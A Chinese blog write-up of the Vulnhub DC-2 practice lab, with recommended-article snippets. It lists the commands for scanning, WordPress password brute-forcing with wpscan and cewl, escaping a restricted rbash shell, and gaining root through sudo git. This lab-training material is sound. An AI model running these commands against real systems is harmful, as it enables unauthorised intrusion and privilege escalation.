Vulnhub DC-2靶机练习 shell限制绕过 sudo-git提权

最新推荐文章于 2024-01-19 18:56:15 发布
最新推荐文章于 2024-01-19 18:56:15 发布
阅读量493 收藏 1
点赞数
分类专栏: 漏洞复现 vulnhub靶场 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43232893/article/details/109116114
版权

Vulnhub DC-2靶机练习 git提权

说明

kali攻击机IP:192.168.255.139
靶机IP:192.168.255.144
靶机下载地址

主机发现

在这里插入图片描述

端口扫描

发现80端口跟7744端口,7744端口是ssh服务
使用的是nmap工具,命令:nmap -sV -Pn -p- -v 192.168.255.144
在这里插入图片描述

访问80端口开启的页面就可以发现flag1

在这里插入图片描述

获取flag1之后提示需要登录,这时我们用到nikto工具扫描敏感目录

扫描之后获得后台管理登录页面wp-login.php
使用的命令是:nikto -h http://dc-2/
在这里插入图片描述
在这里插入图片描述

发现是WordPress的博客网站这里使用wpscan工具获取用户

wpscan工具是一个针对扫描 WordPress 漏洞的黑盒子扫描器
这里我们使用wpscan --url dc-2 -e u命令获取用户名
wpscan工具使用教程:
这里我们发现三个用户名:admin,jerry,tom
在这里插入图片描述

接下来生成密码字典,用到cewl工具

cewl工具是在URL上收集单词的工具
命令:

cewl http://dc-2/ -w 3.txt

在这里插入图片描述

密码字典有了就可以用wpscan工具对账号密码进行爆破

wpscan --url http://dc-2/ -P 3.txt -U admin   //爆破admin的密码,无法爆出
wpscan --url http://dc-2/ -P 3.txt -U jerry   //爆破jerry密码为 adipiscing
wpscan --url http://dc-2/ -P 3.txt -U tom		//爆破tom密码为 parturient

在这里插入图片描述
登录成功获取到flag2
在这里插入图片描述
上面提示访问80端口不是正确的方法,需要换另一种途径,开始通过nmap端口扫描发现还开了一个7744端口是ssh服务,ssh服务默认端口为22.

远程ssh连接

命令为:ssh tom@192.168.255.144 -p 7744

在这里插入图片描述
接下来就是乱翻,在输入ls之后就发现了flag3,但是用cat命令时发现不能用。
在这里插入图片描述
使用compgen -c命令查看能用那些命令,看见可以用vi命令来查看文件。

在这里插入图片描述
这里说明了tom用户和jerry用户 提示说需要使用su命令修改为jerry用户
但是不能用su命令啊,这里不能用某些命令的原因时shell被限制了

绕过shell限制

输入被限制的命令会显示-rbash,rbash是Restricted Shell,即受限的shell,它与一般标准shell的区别在于会限制执行一些行为。
绕过方法

BASH_CMDS[a]=/bin/sh;a     //调用/bin/sh命令解释器
/bin/bash
export PATH=$PATH:/bin/    //设置环境变量
export PATH=$PATH:/usr/bin

在这里插入图片描述
限制解除,用su命令切换到jerry用户
在这里插入图片描述
切换成功,接下来获取flag4
在这里插入图片描述
翻译:
在这里插入图片描述
。。。。。。。。。
还剩下最后一个不多说就是提升到root权限

获取root权限

这里我们可以用到sudo进行提权

sudo是赋予普通用户某个命令有root权限,且不需要root密码,是一种临时的权限

这里使用sudo -l命令来查看那些命令有root权限发现git有权限

sudo -l                //查看存在root权限的命令
sudo git -p --help     //提权
!/bin/bash             //执行获得root权限

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

最后获取最后一个flag

在这里插入图片描述

Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机渗透测试4
qq_52191935的博客
09-01 1452
测试环境:靶机+kali 1.nmap扫描存活主机,得到靶机IP为192.168.152.131 2.对靶机进行全端口扫描,发现80端口(HTTP)及7744端口(SSH)开放 3.根据下载时的提示,要设置hosts文件才能访问到网站 先修改hosts文件,在linux中路径为/etc/hosts,添加如下配置 配置完成后访问80端口,发现访问成功 4.通过网页查看到第一个flag,并得到提示可以使用cewl 5.通过kail的cewl工具生成密码字典,为了便于使用...
网安笔记——提权的各种姿势
qq_64875725的博客
09-13 410
SUID提权的思路就是运行root用户所拥有的SUID的文件,当其他用户运行该文件的时候就得获得root用户的身份。1、使用find命令查看拥有suid权限的文件2、使用exec查看当前用户,text必须是可以找到的文件名,不然会出错,3、然后使用find命令来提权
git提权
最新发布
longwanlian的博客
01-19 933
输入sudo git help config后会有一个很长的文本,在此基础上,按下: ,在输入!然后按q退出,再输出sudo git -p help命令,同上输入!前提:用户可以使用sudogit权限。可以发现git命令存在sudo提权
获取Git权限的三种方式
爬楼的猪的博客
01-09 5572
获取Git权限的三种方式
git提权方法
G_Fu_Q的博客
04-29 3334
当我们拿到系统的权限的时候,发现权限太低,很多命令执行不了的时候,我们应该怎样呢 下面我将介绍一个git提权的方法 前提是执行sudo -l 提示不需要密码可以使用git命令 下面将提示两种方法 1、sudo git help config #在末行命令模式输入 !/bin/bash 或 !'sh' #完成提权 2、sudo git -p help !/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell ...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
2022-渗透测试-git提权(Linux)
保持微笑的博客
02-02 3950
目录 1.什么是提权 2.git提权命令 3.git的使用 1.什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。利用漏洞的最终目的是获取被测系统的最高权限,即Windows中管理员账户的权限,或Linux中root账户的权限。 2.git提权命令 sudo git help config !/bin/bash或者!'sh'完成提权 sudo git -p help !/bin/bash 3.git的使用 这里以DC-2靶场为例。 .
linux脚本切超级用户,Linux-Shell脚本无需以sudo身份运行即可获得超级用户特权
weixin_36382999的博客
04-30 427
这是我的脚本:script.sh:sudo cat /etc/passwd-如果我处于sudo会话中(例如,几分钟前我用sudo运行了另一个命令),现在运行script.sh该脚本将获得sudo访问.但是,如果我运行cat / etc / passwd- /,则会收到拒绝权限错误.作为用户,我不希望script.sh能够这么简单地获得超级用户特权(例如,没有我通过sudo script.sh授予超...
2021-8-8git提权
qq_45290991的博客
08-08 648
一般在linux下,如果发现sudo -l之后可以用git提权的话,就用这个: 基本原理应该是git配置不当存在溢出,溢出的部分如果输入一个交互式窗口就会有交互,类似于suid那样,暂时拥有root,又写了一个交互,就真的有了root的交互: 1. 直接输入!/bin/bash然后回车即可 2. 同理 3. sudo git -p help config 然后同理 ...
web服务中80端口及相关端口内容(包含各个端口的功能自己整理)
AlvinCR的博客
05-10 2980
文章:alvincr.com 原文:http://alvincr.com/2020/05/web%e6%9c%8d%e5%8a%a1%e4%b8%ad80%e7%ab%af%e5%8f%a3%e5%8f%8a%e7%9b%b8%e5%85%b3%e5%86%85%e5%ae%b9/ 1端口 1.1 定义 Incomputer networking, aportis a communication endpoint. At the software level, within anopera...
vulnhub靶场之DC-2
qq_58091216的博客
01-07 1097
1)我们使用ssh登录账号,用jerry登录半天登录不上去,我们使用tom进行登录,发现可以登录成功,而且看到了flag3.txt。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git提权。虚拟机开启之后界面如下(和1一样),我们不知道ip,需要自己探活,网段知道:192.168.52.0/24。与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。添加完成之后,再次访问,访问成功(我们使用kali里面的浏览器)
Linux提权——SUDO
negnegil的博客
09-03 9202
使用Sudo权限提升Linux账户权限 在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。如下图 Sudoer文件语法 假如我们(root用户)要给普通用户test分配sudo权限,请输出vim /etc/sudoers打开文件进行编辑,找到root权限root ALL=(ALL:ALL) ALL,在下一行输入 test ALL(ALL:ALL) ALL,保存后退出,这样即表示用户test可以使用sudo调用root权
靶机DC-2练习:通过rbash绕过获取shell,使用git命令提权
7Riven's blog
12-24 1866
1.主机发现 靶机IP地址:192.168.109.163 2.扫描目标服务版本 3.发现80端口,访问主页 访问失败 很显然,本地不解析该域名,在/etc/hosts文件中添加即可 再次刷新网页 单击首页左下角 发现flag1:出现疑似用户名cewl,登录后找下一个flag 网页其他模块未发现有效信息,接下来扫描一下后台目录 4.工具扫描后台目...
DC-2(VI GIT提权)
E1even的博客
08-25 929
文章目录扫描网段内存活主机及其开放端口FLAG1:访问即可FLAG2:使用工具爆破用户密码FLAG3:SSH登录并绕过rbash限制FLAG4:VI提权FLAG5:GIT提权 kali攻击????:192.168.78.131 目标主机:192.168.78.xxx 环境配置参照DC-1 扫描网段内存活主机及其开放端口 使用命令查询主机所在网段 ifconfig 得到网段192.168.78.xxx,扫描该网段内其他存活的主机 nmap -sP 192.168.78.0/24 发现192.168.
记录靶机渗透中用到的提权方法
Yaphst的博客
03-15 5645
1、find提权 (1)首先使用如下命令查看具有suid 权限的可执行二进制程序 find / -perm -4000 -type f 2>/dev/null 或 find / -perm -u=s -type f 2>/dev/null 参数含义参考find基础命令 -perm:按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限 -type:d(目录)f(文件)c(字符设备文件)b(块设备文
复现DC-1靶机:Drupal CMS漏洞挖掘与利用
"复现DC-1靶机的攻防演练过程,涉及网络扫描、漏洞检测、Drupal CMS的利用以及数据库操作。" 在网络安全领域,靶机是一种模拟真实系统环境的工具,用于安全研究人员和渗透测试人员进行实战演练和技能提升。本资源是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值